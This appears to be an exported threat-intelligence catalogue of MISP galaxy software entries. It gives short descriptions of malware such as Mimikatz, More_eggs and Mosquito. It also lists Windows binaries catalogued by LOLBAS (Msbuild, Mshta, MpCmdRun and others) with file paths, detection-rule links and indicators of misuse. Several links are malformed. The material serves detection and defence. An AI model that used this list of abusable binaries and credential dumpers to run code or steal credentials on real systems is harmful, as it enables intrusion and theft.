<sup>[[Microsoft.Workflow.Compiler.exe - LOLBAS Project](/references/1e659b32-a06f-45dc-a1eb-03f1a42c55ef)]</sup>

The tag is: misp-galaxy:software="Microsoft.Workflow.Compiler.exe - Associated Software"

Microsoft.Workflow.Compiler

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.

Author: Conor Richard

Paths: * C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe

Detection: * Sigma: [proc_creation_win_lolbin_workflow_compiler.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml) * Splunk: [suspicious_microsoft_workflow_compiler_usage.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml) * Splunk: [suspicious_microsoft_workflow_compiler_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml) * Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml) * Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml) * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. * IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe * IOC: Presence of "<CompilerInput" in a text file.<sup>[[Microsoft.Workflow.Compiler.exe - LOLBAS Project](/references/1e659b32-a06f-45dc-a1eb-03f1a42c55ef)]</sup>

The tag is: misp-galaxy:software="Microsoft.Workflow.Compiler"

James - Associated Software

<sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:software="James - Associated Software"

Milan

The tag is: misp-galaxy:software="Milan"

Mimikatz

[Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. <sup>[[Deply Mimikatz](https://app.tidalcyber.com/references/c92d890c-2839-433a-b458-f663e66e1c63)]</sup> <sup>[[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]</sup>

The tag is: misp-galaxy:software="Mimikatz"

MimiPenguin

[MimiPenguin](https://app.tidalcyber.com/software/42350632-b59a-4cc5-995e-d95d8c608553) is a credential dumper, similar to [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16), designed specifically for Linux platforms. <sup>[[MimiPenguin GitHub May 2017](https://app.tidalcyber.com/references/b10cd6cc-35ed-4eac-b213-110de28f33ef)]</sup>

The tag is: misp-galaxy:software="MimiPenguin"

Miner-C

[Miner-C](https://app.tidalcyber.com/software/c0dea9db-1551-4f6c-8a19-182efc34093a) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. <sup>[[Softpedia MinerC](https://app.tidalcyber.com/references/087b9bf1-bd9e-4cd6-a386-d9d2c812c927)]</sup>

The tag is: misp-galaxy:software="Miner-C"

MiniDuke

The tag is: misp-galaxy:software="MiniDuke"

MirageFox

[MirageFox](https://app.tidalcyber.com/software/535f1b97-7a70-4d18-be4e-3a9f74ccf78a) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. <sup>[[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]</sup>

The tag is: misp-galaxy:software="MirageFox"

Misdat

The tag is: misp-galaxy:software="Misdat"

Mis-Type

The tag is: misp-galaxy:software="Mis-Type"

Mivast

[Mivast](https://app.tidalcyber.com/software/f603ea32-91c3-4b62-a60f-57670433b080) is a backdoor that has been used by [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b). It was reportedly used in the Anthem breach. <sup>[[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)]</sup>

The tag is: misp-galaxy:software="Mivast"

Mmc.exe - Associated Software

<sup>[[Mmc.exe - LOLBAS Project](/references/490b6769-e386-4a3d-972e-5a919cb2f6f5)]</sup>

The tag is: misp-galaxy:software="Mmc.exe - Associated Software"

Mmc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Load snap-ins to locally and remotely manage Windows systems

Author: @bohops

Paths: * C:\Windows\System32\mmc.exe * C:\Windows\SysWOW64\mmc.exe

Detection: * Sigma: [proc_creation_win_mmc_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml) * Sigma: [file_event_win_uac_bypass_dotnet_profiler.yml]([Mmc.exe - LOLBAS Project(/references/490b6769-e386-4a3d-972e-5a919cb2f6f5)]</sup>

The tag is: misp-galaxy:software="Mmc"

MobileOrder

[MobileOrder](https://app.tidalcyber.com/software/116f913c-0d5e-43d1-ba0d-3a12127af8f6) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4). <sup>[[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]</sup>

The tag is: misp-galaxy:software="MobileOrder"

MoleNet

[MoleNet](https://app.tidalcyber.com/software/7ca5debb-f813-4e06-98f8-d1186552e5d2) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.<sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup>

The tag is: misp-galaxy:software="MoleNet"

Mongall

The tag is: misp-galaxy:software="Mongall"

MoonWind

[MoonWind](https://app.tidalcyber.com/software/a699f32f-6596-4060-8fcd-42587a844b80) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. <sup>[[Palo Alto MoonWind March 2017](https://app.tidalcyber.com/references/4f3d7a08-2cf5-49ed-8bcd-6df180f3d194)]</sup>

The tag is: misp-galaxy:software="MoonWind"

SKID - Associated Software

The tag is: misp-galaxy:software="SKID - Associated Software"

Terra Loader - Associated Software

The tag is: misp-galaxy:software="Terra Loader - Associated Software"

SpicyOmelette - Associated Software

<sup>[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]</sup>

The tag is: misp-galaxy:software="SpicyOmelette - Associated Software"

More_eggs

[More_eggs](https://app.tidalcyber.com/software/69f202e7-4bc9-4f4f-943f-330c053ae977) is a JScript backdoor used by [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. <sup>[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)]</sup><sup>[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]</sup>

The tag is: misp-galaxy:software="More_eggs"

Mori

[Mori](https://app.tidalcyber.com/software/385e1eaf-9ba8-4381-981a-3c7af718a77d) is a backdoor that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least January 2022.<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]</sup>

The tag is: misp-galaxy:software="Mori"

Mosquito

[Mosquito](https://app.tidalcyber.com/software/c3939dad-d728-4ddb-804e-cf1e3743a55d) is a Win32 backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). [Mosquito](https://app.tidalcyber.com/software/c3939dad-d728-4ddb-804e-cf1e3743a55d) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. <sup>[[ESET Turla Mosquito Jan 2018](https://app.tidalcyber.com/references/cd177c2e-ef22-47be-9926-61e25fd5f33b)]</sup>

The tag is: misp-galaxy:software="Mosquito"

MpCmdRun.exe - Associated Software

<sup>[[MpCmdRun.exe - LOLBAS Project](/references/2082d5ca-474f-4130-b275-c1ac5e30064c)]</sup>

The tag is: misp-galaxy:software="MpCmdRun.exe - Associated Software"

MpCmdRun

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary part of Windows Defender. Used to manage settings in Windows Defender

Author: Oddvar Moe

Paths: * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe

Detection: * Sigma: [win_susp_mpcmdrun_download.yml](https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml) * Elastic: [command_and_control_remote_file_copy_mpcmdrun.toml](https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml) * IOC: MpCmdRun storing data into alternate data streams. * IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. * IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log * IOC: User Agent is "MpCommunication"<sup>[[MpCmdRun.exe - LOLBAS Project](/references/2082d5ca-474f-4130-b275-c1ac5e30064c)]</sup>

The tag is: misp-galaxy:software="MpCmdRun"

Msbuild.exe - Associated Software

<sup>[[LOLBAS Msbuild](/references/de8e0741-255b-4c41-ba50-248ac5acc325)]</sup>

The tag is: misp-galaxy:software="Msbuild.exe - Associated Software"

Msbuild

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to compile and execute code

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe * C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe

Detection: * Sigma: [file_event_win_shell_write_susp_directory.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml) * Sigma: [proc_creation_win_msbuild_susp_parent_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml) * Sigma: [net_connection_win_silenttrinity_stager_msbuild_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml) * Splunk: [suspicious_msbuild_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml) * Splunk: [suspicious_msbuild_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml) * Splunk: [msbuild_suspicious_spawned_by_script_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml) * Elastic: [defense_evasion_msbuild_beacon_sequence.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml) * Elastic: [defense_evasion_msbuild_making_network_connections.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml) * Elastic: [defense_evasion_execution_msbuild_started_by_script.toml](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml) * Elastic: [defense_evasion_execution_msbuild_started_by_office_app.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml) * Elastic: [defense_evasion_execution_msbuild_started_renamed.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml) * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: Msbuild.exe should not normally be executed on workstations<sup>[[LOLBAS Msbuild](/references/de8e0741-255b-4c41-ba50-248ac5acc325)]</sup>

The tag is: misp-galaxy:software="Msbuild"

Msconfig.exe - Associated Software

<sup>[[Msconfig.exe - LOLBAS Project](/references/a073d2fc-d20d-4a52-944e-85ff89f04978)]</sup>

The tag is: misp-galaxy:software="Msconfig.exe - Associated Software"

Msconfig

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows

Author: Oddvar Moe

Paths: * C:\Windows\System32\msconfig.exe

Detection: * Sigma: [proc_creation_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml) * Sigma: [file_event_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml) * IOC: mscfgtlc.xml changes in system32 folder<sup>[[Msconfig.exe - LOLBAS Project](/references/a073d2fc-d20d-4a52-944e-85ff89f04978)]</sup>

The tag is: misp-galaxy:software="Msconfig"

Msdeploy.exe - Associated Software

<sup>[[Msdeploy.exe - LOLBAS Project](/references/e563af9a-5e49-4612-a52b-31f22f76193c)]</sup>

The tag is: misp-galaxy:software="Msdeploy.exe - Associated Software"

Msdeploy

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft tool used to deploy Web Applications.

Author: Oddvar Moe

Paths: * C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe

Detection: * Sigma: [proc_creation_win_lolbin_msdeploy.yml]([Msdeploy.exe - LOLBAS Project(/references/e563af9a-5e49-4612-a52b-31f22f76193c)]</sup>

The tag is: misp-galaxy:software="Msdeploy"

Msdt.exe - Associated Software

<sup>[[Msdt.exe - LOLBAS Project](/references/3eb1750c-a2f2-4d68-b060-ceb32f44f5fe)]</sup>

The tag is: misp-galaxy:software="Msdt.exe - Associated Software"

Msdt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft diagnostics tool

Author: Oddvar Moe

Paths: * C:\Windows\System32\Msdt.exe * C:\Windows\SysWOW64\Msdt.exe

Detection: * Sigma: [proc_creation_win_lolbin_msdt_answer_file.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml) * Sigma: [proc_creation_win_msdt_arbitrary_command_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml) * Elastic: [defense_evasion_network_connection_from_windows_binary.toml]([Msdt.exe - LOLBAS Project(/references/3eb1750c-a2f2-4d68-b060-ceb32f44f5fe)]</sup>

The tag is: misp-galaxy:software="Msdt"

Msedge.exe - Associated Software

<sup>[[Msedge.exe - LOLBAS Project](/references/6169c12e-9753-4e48-8213-aff95b0f6a95)]</sup>

The tag is: misp-galaxy:software="Msedge.exe - Associated Software"

Msedge

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Edge browser

Author: mr.d0x

Paths: * c:\Program Files\Microsoft\Edge\Application\msedge.exe * c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Detection: * Sigma: [proc_creation_win_browsers_msedge_arbitrary_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml) * Sigma: [proc_creation_win_browsers_chromium_headless_file_download.yml]([Msedge.exe - LOLBAS Project(/references/6169c12e-9753-4e48-8213-aff95b0f6a95)]</sup>

The tag is: misp-galaxy:software="Msedge"

msedge_proxy.exe - Associated Software

<sup>[[msedge_proxy.exe - LOLBAS Project](/references/a6fd4727-e22f-4157-9a5f-1217cb876b32)]</sup>

The tag is: misp-galaxy:software="msedge_proxy.exe - Associated Software"

msedge_proxy

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Edge Browser

Author: Mert Daş

Paths: * C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe

Resources: None Provided

Detection: None Provided<sup>[[msedge_proxy.exe - LOLBAS Project](/references/a6fd4727-e22f-4157-9a5f-1217cb876b32)]</sup>

The tag is: misp-galaxy:software="msedge_proxy"

msedgewebview2.exe - Associated Software

<sup>[[msedgewebview2.exe - LOLBAS Project](/references/8125ece7-10d1-4e79-8ea1-724fe46a3c97)]</sup>

The tag is: misp-galaxy:software="msedgewebview2.exe - Associated Software"

msedgewebview2

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.

Author: Matan Bahar

Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe

Detection: * IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path<sup>[[msedgewebview2.exe - LOLBAS Project](/references/8125ece7-10d1-4e79-8ea1-724fe46a3c97)]</sup>

The tag is: misp-galaxy:software="msedgewebview2"

Mshta.exe - Associated Software

<sup>[[LOLBAS Mshta](/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]</sup>

The tag is: misp-galaxy:software="Mshta.exe - Associated Software"

Mshta

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute html applications. (.hta)

Author: Oddvar Moe

Paths: * C:\Windows\System32\mshta.exe * C:\Windows\SysWOW64\mshta.exe

Detection: * Sigma: [proc_creation_win_mshta_susp_pattern.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml) * Sigma: [proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml) * Sigma: [proc_creation_win_mshta_lethalhta_technique.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml) * Sigma: [proc_creation_win_mshta_javascript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml) * Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml) * Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml) * Elastic: [defense_evasion_mshta_beacon.toml](https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml) * Elastic: [lateral_movement_dcom_hta.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Splunk: [suspicious_mshta_activity.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml) * Splunk: [detect_mshta_renamed.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml) * Splunk: [suspicious_mshta_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml) * Splunk: [suspicious_mshta_child_process.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml) * Splunk: [detect_mshta_url_in_command_line.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml) * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: mshta.exe executing raw or obfuscated script within the command-line * IOC: General usage of HTA file * IOC: msthta.exe network connection to Internet/WWW resource * IOC: DotNet CLR libraries loaded into mshta.exe * IOC: DotNet CLR Usage Log - mshta.exe.log<sup>[[LOLBAS Mshta](/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]</sup>

The tag is: misp-galaxy:software="Mshta"

Mshtml.dll - Associated Software

<sup>[[Mshtml.dll - LOLBAS Project](/references/1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0)]</sup>

The tag is: misp-galaxy:software="Mshtml.dll - Associated Software"

Mshtml

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft HTML Viewer

Author: LOLBAS Team

Paths: * c:\windows\system32\mshtml.dll * c:\windows\syswow64\mshtml.dll

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml]([Mshtml.dll - LOLBAS Project(/references/1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0)]</sup>

The tag is: misp-galaxy:software="Mshtml"

Msiexec.exe - Associated Software

<sup>[[LOLBAS Msiexec](/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]</sup>

The tag is: misp-galaxy:software="Msiexec.exe - Associated Software"

Msiexec

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute msi files

Author: Oddvar Moe

Paths: * C:\Windows\System32\msiexec.exe * C:\Windows\SysWOW64\msiexec.exe

The tag is: misp-galaxy:software="Msiexec"

MsoHtmEd.exe - Associated Software

<sup>[[MsoHtmEd.exe - LOLBAS Project](/references/c39fdefa-4c54-48a9-8357-ffe4dca2a2f4)]</sup>

The tag is: misp-galaxy:software="MsoHtmEd.exe - Associated Software"

MsoHtmEd

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office component

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_msohtmed_download.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml) * IOC: Suspicious Office application internet/network traffic<sup>[[MsoHtmEd.exe - LOLBAS Project](/references/c39fdefa-4c54-48a9-8357-ffe4dca2a2f4)]</sup>

The tag is: misp-galaxy:software="MsoHtmEd"

Mspub.exe - Associated Software

<sup>[[Mspub.exe - LOLBAS Project](/references/41eff63a-fef0-4b4b-86f7-0908150fcfcf)]</sup>

The tag is: misp-galaxy:software="Mspub.exe - Associated Software"

Mspub

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Publisher

Author: Nir Chako

